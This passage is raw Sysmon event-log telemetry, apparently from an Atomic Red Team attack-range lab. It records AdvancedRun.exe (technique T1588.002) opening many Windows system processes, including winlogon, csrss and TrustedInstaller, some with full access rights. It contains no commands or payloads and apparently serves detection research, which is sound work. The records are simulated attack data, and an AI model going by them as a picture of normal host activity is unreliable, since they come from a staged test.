L32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003983128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
